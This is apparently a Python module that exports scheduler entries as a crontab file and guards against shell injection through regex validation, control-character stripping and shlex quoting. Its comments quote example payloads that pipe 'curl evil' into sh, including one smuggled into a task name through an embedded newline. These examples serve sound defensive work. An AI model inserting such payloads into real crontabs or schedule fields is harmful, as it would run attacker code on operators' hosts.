"""Render exported schedules as a system crontab file.

Output is a 5-field crontab. Because z4j tasks are not shell
commands, the export needs an operator-supplied wrapper script
that invokes the named task. The header comment names the
expected wrapper convention so the operator can install one.

Example:

    # Generated by z4j-scheduler export --to cron
    # Each row invokes <wrapper> with the z4j task name as the
    # only argument. Replace WRAPPER below with the absolute path
    # to your wrapper script.
    WRAPPER=/usr/local/bin/run-z4j-task

    0 * * * *  $WRAPPER myapp.tasks.heartbeat
    */5 * * * *  $WRAPPER myapp.tasks.poll_orders

Interval schedules are converted to ``*/N`` cron expressions when
the interval is a clean divisor (``30s`` → every minute,
``5m`` → ``*/5 * * * *``, ``1h`` → ``0 * * * *``). Non-trivial
intervals (e.g. ``45s``) emit a comment + skip; system cron has
no native sub-minute or non-uniform cadence.

One-shot schedules emit a commented ``@reboot``-style placeholder
because system cron has no native one-shot trigger.
"""

from __future__ import annotations

import re
import shlex
from collections.abc import Iterable

from z4j_scheduler.exporters._client import ExportedSchedule

_INTERVAL_TO_CRON: dict[str, str] = {
    # Common intervals → equivalent 5-field cron expression.
    "60s": "* * * * *",
    "1m": "* * * * *",
    "300s": "*/5 * * * *",
    "5m": "*/5 * * * *",
    "600s": "*/10 * * * *",
    "10m": "*/10 * * * *",
    "900s": "*/15 * * * *",
    "15m": "*/15 * * * *",
    "1800s": "*/30 * * * *",
    "30m": "*/30 * * * *",
    "3600s": "0 * * * *",
    "1h": "0 * * * *",
    "86400s": "0 0 * * *",
    "1d": "0 0 * * *",
}


def render(schedules: Iterable[ExportedSchedule]) -> str:
    """Return a crontab-shaped string."""
    schedules = list(schedules)
    lines: list[str] = [
        "# Generated by `z4j-scheduler export --to cron`. Do not edit by hand.",
        "# Each row invokes WRAPPER with the z4j task name as the",
        "# only argument. Set WRAPPER to your wrapper script path.",
        "WRAPPER=/usr/local/bin/run-z4j-task",
        "",
    ]
    for sched in schedules:
        lines.extend(_render_one(sched))
    return "\n".join(lines) + "\n"


# The cron exporter renders SHELL lines that the operator installs
# into a real crontab. Any field
# interpolated raw becomes a shell-injection vector when cron
# evaluates the line via /bin/sh.
#
# A 5-field cron expression is `[<minute> <hour> <dom> <month>
# <dow>]` where each field is one of: an integer, ``*``, a list
# (``,``), a range (``-``), or a step (``/``). Anything else
# (semicolons, backticks, ``$(...)``, ``|``, redirects) is a
# shell metacharacter that has no business in a crontab field.
# This regex strictly rejects everything outside that vocabulary
# so a malicious expression like ``"* * * * * ; curl evil"`` is
# refused at export time rather than written to the crontab.
_CRON_FIELD_CHARS = re.compile(r"^[\d*/,\-]+$")


def _is_safe_cron_expression(expression: str) -> bool:
    """True iff ``expression`` is a syntactically safe cron string.

    Conservative: 5- or 6-field, every field matching
    ``_CRON_FIELD_CHARS``. Rejects DOW name aliases (``MON-FRI``)
    even though croniter accepts them - the operator can pre-
    convert these on the brain side before exporting if needed.
    Letters in cron fields would also be safe in theory (`/bin/sh`
    doesn't interpret bare letters specially), but allowing them
    would expand the audit surface for diminishing return.
    """
    fields = expression.strip().split()
    if len(fields) not in (5, 6):
        return False
    return all(_CRON_FIELD_CHARS.match(f) for f in fields)


def _render_one(sched: ExportedSchedule) -> list[str]:  # noqa: PLR0911  schedule-kind dispatch
    # Strip control chars from
    # ``task_name`` BEFORE ``shlex.quote``. ``shlex.quote`` wraps
    # the value in single quotes, which preserve newlines
    # literally - so a task_name carrying ``"x\n* * * * * curl
    # evil|sh\n#"`` was quoted into a multi-line single-quoted
    # string that, when rendered into a cron WRAPPER line, broke
    # the line at the newline and turned the rest of the payload
    # into an active cron entry. The control-char strip neutralises
    # the bypass before quoting; the brain-side
    # ``pattern=_NO_CONTROL_CHARS`` validator also rejects this at
    # the API boundary (companion change in api/schedules.py).
    cleaned_task_name = re.sub(
        r"[\r\n\x00]+",
        " ",
        sched.task_name,
    )[:200]
    # ``shlex.quote`` defends against an attacker who plants a
    # schedule with a malicious task_name like ``$(curl evil.com)``.
    # Without quoting, the resulting cron line would be evaluated
    # by /bin/sh when the WRAPPER fires - a remote-code-execution
    # vector. Audit-Phase3-3 caught this.
    safe_task_name = shlex.quote(cleaned_task_name)
    # Comments are technically inert but a name with an embedded
    # newline could break out of the
    # comment and inject an active crontab line below. Sanitize
    # the name to a single line of printable characters; if the
    # operator wants exotic names they live in the dashboard,
    # not in their crontab.
    safe_name = re.sub(r"[\r\n\x00]+", " ", sched.name)[:200]
    # Same treatment for the comment-form of task_name.
    safe_task_name_comment = cleaned_task_name
    # Same treatment for the expression where it appears in a
    # comment context (cron lines below use ``!r`` so repr-escaping
    # already neutralises newlines, but the comment-only branches
    # for interval / one_shot / refused-cron benefit from the
    # explicit cap).
    safe_expression = re.sub(
        r"[\r\n\x00]+",
        " ",
        sched.expression,
    )[:200]

    if not sched.is_enabled:
        return [
            f"# DISABLED in z4j: {safe_name} ({safe_task_name_comment}) -",
            "# uncomment to enable.",
            f"# 0 * * * * $WRAPPER {safe_task_name}",
            "",
        ]

    if sched.kind == "cron":
        expression = sched.expression
        # Refuse to render a cron line whose expression contains
        # shell metacharacters. The
        # operator's source-of-truth (brain DB or migrated
        # crontab) might have an attacker-controlled expression
        # field - validating at emit time is the last line of
        # defense before the operator pastes the rendered file
        # into a real crontab. Render a comment instead so the
        # rest of the export still parses.
        if not _is_safe_cron_expression(expression):
            return [
                f"# {safe_name}: REFUSED to render cron expression "
                f"{safe_expression!r} - contains characters outside the",
                "# cron field vocabulary [0-9*/,-]. Edit the schedule in z4j and re-export.",
                "",
            ]
        return [
            f"# {safe_name}",
            f"{expression} $WRAPPER {safe_task_name}",
            "",
        ]

    if sched.kind == "interval":
        cron_expr = _INTERVAL_TO_CRON.get(sched.expression.strip())
        if cron_expr is None:
            return [
                f"# {safe_name}: interval {safe_expression!r} cannot be",
                "# expressed in 5-field cron - keep z4j-scheduler for this row.",
                "",
            ]
        return [
            f"# {safe_name} (was interval {safe_expression!r} in z4j)",
            f"{cron_expr} $WRAPPER {safe_task_name}",
            "",
        ]

    if sched.kind in ("clocked", "one_shot"):
        return [
            f"# {safe_name}: one_shot at {safe_expression!r} - system cron",
            "# has no native one-shot. Use ``at`` or run manually.",
            "",
        ]

    return [
        f"# unknown kind {sched.kind!r} for schedule {safe_name!r}",
        "",
    ]


__all__ = ["render"]
